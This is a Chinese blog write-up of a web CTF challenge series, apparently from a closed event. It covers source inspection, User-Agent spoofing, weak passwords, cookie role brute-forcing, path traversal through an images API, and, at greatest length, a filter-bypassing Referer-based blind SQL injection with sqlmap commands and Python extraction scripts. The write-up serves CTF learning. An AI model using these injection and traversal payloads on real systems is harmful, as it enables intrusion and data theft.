00x1 第一题:
题目:页面的背后是什么?
看源码

直接访问http://xxxx/api/admin即可
00x2 第二题:
题目:真正的秘密只有特殊的设备才能看到
需要更改User-Agent为bilibili Security Browser

00x3 第三题
题目:密码是啥?
弱口令
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iFX7Y2G3-1603677971992)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.003.png)]](/https://i-blog.csdnimg.cn/blog_migrate/a72b62006971f904fa517535b4dde7d4.png#pic_center)
00x4 第四题
题目:对不起,权限不足~
首先查看源码
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bbC7PK9y-1603677971994)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.004.png)]](/https://i-blog.csdnimg.cn/blog_migrate/23a93f932dceb9393045a448bd3b34d2.png#pic_center)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-n37EEB0v-1603677971995)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.005.png)]](/https://i-blog.csdnimg.cn/blog_migrate/fdccf856f2d2dbf4cac2cee0e38dc9b5.png#pic_center)
将role值解密为 user
对role值进行爆破
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FmJouWcJ-1603677971996)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.006.png)]](/https://i-blog.csdnimg.cn/blog_migrate/69404062994c608026d2810274fa0e78.png#pic_center)
00x5 第五题
题目:别人的秘密
查看源码
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R5cLyMco-1603677971997)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.007.png)]](/https://i-blog.csdnimg.cn/blog_migrate/1ea313de2f333746d3aedf8ad511a91c.png#pic_center)

遍历uid值

00x6 第六题
结束亦是开始
从大佬(机智的狐狸菌)那里搬运过来的,题已经关闭了无法复现,收藏一下。
sqlmap -u 'http://45.113.201.36/blog/single.php?id=1' --batch --level 5 --risk 3 --flush-session

sqlmap发现存在referer时间盲注,且后端数据库为MySQL,加上--dbms mysql --dbs开始枚举裤名

结果跑不出裤名,我爪巴了,看来是有过滤了。
经过群里某位不想暴露ID的大佬点破,手工构建referer
Referer: 0'^if(substr((selselectect database()),1,1)>binary 0x65,(selecselectt 1+~0),0) ununionion selecselectt 1,2#

成功回显。接下来套用脚本
import requests
url='http://120.92.151.189/blog/single.php?id=1'
flag=''
for i in range(1,8):
left=33
right=128
while right-left!=1:
mid=(left+right)/2
# 读数据库名
payload="0'^if(substr((selselectect database()),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
# 读裤中有的表
# payload="0'^if(substr((seleselectct group_concat(table_name) from infoorrmation_schema.tables whewherere table_schema=database()),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
# 读表中存在的字段
# payload="0'^if(substr((selselectect group_concat(column_name) from infoorrmation_schema.columns whewherere table_name='flag' anandd table_schema=database()),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
headers={
'Referer':payload
}
r=requests.get(url=url,headers=headers)
if len(r.text) == 5596:
left=mid
else:
right=mid
flag+=chr(right)
print (flag)
获得库名、表名及字段名



接下来套用脚本获取flag
import requests
url='http://120.92.151.189/blog/single.php?id=1'
flag=''
for i in range(1,40):
left=33
right=128
while right-left!=1:
mid=(left+right)/2
payload="0'^if(substr((selselectect flag from bilictf.flag),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
# print(payload)
headers={
'Referer':payload
}
r=requests.get(url=url,headers=headers)
if len(r.text) == 5596:
left=mid
else:
right=mid
# print(hex((left+right)/2))
# print(right)
flag+=chr(right)
print (flag)
获得flag6

00x7 第七题
需要少年自己去探索啦~
从大佬(机智的狐狸菌)那里搬运过来的,题已经关闭了无法复现,收藏一下。
在某一题的源码发现了一个可疑的api地址
http://45.113.201.36/api/images?file=banner.png

猜测是任意目录访问,猜解一下
http://45.113.201.36/api/images?file=…/…/…/secret.txt

获得神秘字符串

访问得到神秘字符串
一看就是base64 一次解密得到
JDFX6QfrqzRPSmX0N61M89ipWYtJV/pBQTBOYaXQuG8fArrun3WKxWFZGwNn21cG
解密个屁啊,将secret.txt修改为flag7.txt
访问http://45.113.201.36/api/images?file=…/…/…/flag7.txt获得flag7

00x8 第八题
端口扫描扫出6379端口
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-56iWgxns-1603677972000)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.010.png)]](/https://i-blog.csdnimg.cn/blog_migrate/7ea289067246af447916b7123f6f7c37.png#pic_center)
00x10 第十题
第十题的答案就是第六题做出来的flag
查看源码没有可利用的东西
进行目录扫描,扫描出http://xxxx/blog/test.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-my7uUifp-1603677972001)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.011.png)]](/https://i-blog.csdnimg.cn/blog_migrate/9ede2e605d3b5014a5d53af3b3a69131.png#pic_center)
JS Fuck解密


Github搜索
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9tSNXCQ6-1603677972002)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.014.png)]](/https://i-blog.csdnimg.cn/blog_migrate/df216abf9c42df6509a647af3bf67085.png#pic_center)
但是这个不对
应该是这一个

根据代码提示构造url,并根据前面的路径猜测。后面发现只要有flag.txt就行
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xYzQ0kRZ-1603677972003)(2f9a03a1-ecb0-43bc-9653-ce31e18892c0.016.png)]](/https://i-blog.csdnimg.cn/blog_migrate/359f4b145d4c6f3100bf4dc5d922b36d.png#pic_center)
看着这是第十题的flag

本文介绍了一系列渗透测试实战技巧,包括利用特殊User-Agent绕过限制、弱口令攻击、权限提升等方法,并通过具体实例展示了如何使用SQL注入技术获取敏感信息。


1509

被折叠的 条评论
为什么被折叠?



